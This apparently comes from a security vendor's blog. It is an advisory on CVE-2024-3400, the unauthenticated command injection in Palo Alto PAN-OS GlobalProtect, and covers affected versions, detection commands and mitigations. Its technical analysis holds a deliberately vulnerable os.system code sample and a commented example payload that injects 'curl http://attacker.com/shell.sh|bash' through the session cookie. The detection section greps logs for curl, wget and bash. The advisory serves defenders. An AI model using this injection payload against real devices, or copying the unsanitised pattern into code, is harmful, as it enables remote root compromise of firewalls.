Critical CVE-2024-3400 January 2026 · 9 min read

CVE-2024-3400: Palo Alto PAN-OS Command Injection — CVSS 10.0

CVE-2024-3400 is a maximum-severity OS command injection vulnerability in Palo Alto Networks PAN-OS GlobalProtect gateway. An unauthenticated attacker can execute arbitrary OS commands as root with no interaction required. Exploited by UTA0218 (likely state-sponsored) before disclosure.


10.0
CRITICAL (MAX)
AttributeValue
CVE IDCVE-2024-3400
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-77: OS Command Injection
PublishedApril 12, 2024
ExploitationActive — CISA KEV, nation-state exploitation

What Is CVE-2024-3400?

CVE-2024-3400 affects the GlobalProtect feature of Palo Alto Networks PAN-OS. When GlobalProtect is configured as a gateway or portal, an unauthenticated remote attacker can inject arbitrary OS commands that execute with root privileges on the firewall appliance.

The combination of factors — no authentication required, network accessible, changed scope, maximum impact on confidentiality, integrity, and availability — yields a perfect CVSS 10.0 score. Among firewall vendors, only a handful of vulnerabilities have ever received this score.

🚨 Nation-State Exploitation Before Patch Availability

Volexity discovered this vulnerability while responding to an incident where UTA0218, a sophisticated threat actor, had deployed a novel Python backdoor called UPSTYLE on compromised PAN-OS devices. The attacker used the firewall as a pivot point to access internal networks, steal Active Directory credentials, and exfiltrate sensitive data. Volexity estimates exploitation began in late March 2024 — weeks before Palo Alto was notified.

Affected Systems

PAN-OS VersionAffected (GlobalProtect enabled)Fixed Version
PAN-OS 11.1< 11.1.2-h311.1.2-h3+
PAN-OS 11.0< 11.0.4-h111.0.4-h1+
PAN-OS 10.2< 10.2.9-h110.2.9-h1+
PAN-OS 10.1< 10.1.14-h410.1.14-h4+

Prerequisite: GlobalProtect gateway or portal must be configured (show global-protect-gateway current-user returns results). Organizations that haven't configured GlobalProtect are not affected.

Technical Analysis

The injection point is in the GlobalProtect session handling code. When a GlobalProtect session is established, certain session attributes are written to temporary files on the firewall. The code that constructs the file path for these session files does not properly sanitize the session identifier, which is partially attacker-controlled.

# Simplified vulnerable file path construction
SESSION_ID = request.cookie["SESSID"]  # Attacker-controlled
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}")  # Command injection here

# Attacker crafts session ID containing shell metacharacters:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"

The UPSTYLE backdoor installed by UTA0218 used a novel persistence mechanism: a Python script that monitored web server access logs for specific request patterns (containing an encrypted command), executed the commands, and then restored the original file content to remove evidence of the activity.

Post-Exploitation Activity (UTA0218)

Volexity documented the following post-exploitation sequence from nation-state actors:

Detection

PAN-OS Log Analysis

# Check for UPSTYLE backdoor artifacts
find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null

# Suspicious traffic in GlobalProtect logs
grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log

# Modified system files (UPSTYLE modifies then restores)
# Check for recent access times on web server files
find /var/appweb -atime -7 -name "*.php" -o -name "*.py"

Threat Hunting Queries

Mitigation

  1. Patch immediately: Apply hotfix versions listed above. This is a CVSS 10.0 with active exploitation — there is no acceptable delay.
  2. Threat Prevention interim workaround: For unpatched devices, enable Threat Prevention with security profiles on GlobalProtect interfaces. Palo Alto provided specific threat ID signatures.
  3. Disable GlobalProtect if not needed: Organizations not actively using GlobalProtect can temporarily disable the feature as a workaround.
  4. Audit firewall files: Run Palo Alto's provided script to check for UPSTYLE and other post-exploitation artifacts.
  5. Rotate all credentials: Any credentials stored in the firewall configuration (VPN certificates, LDAP bind credentials, etc.) must be considered compromised.

💡 CISA Emergency Directive: CISA issued Emergency Directive 24-03 requiring all US federal agencies to apply patches or mitigations by April 19, 2024. The urgency reflects the severity and active exploitation by sophisticated threat actors.

KENSAI Detection Capability

Is Your Palo Alto Infrastructure Exposed to CVE-2024-3400?

KENSAI instantly identifies internet-facing PAN-OS devices vulnerable to command injection. Don't wait for threat actors to find them first.

Scan Your Perimeter Now →

Related Articles

AI-Assisted Malware Industrialization: Transparent Redirecting... KENSAI vs SonarQube: 2025 के लिए...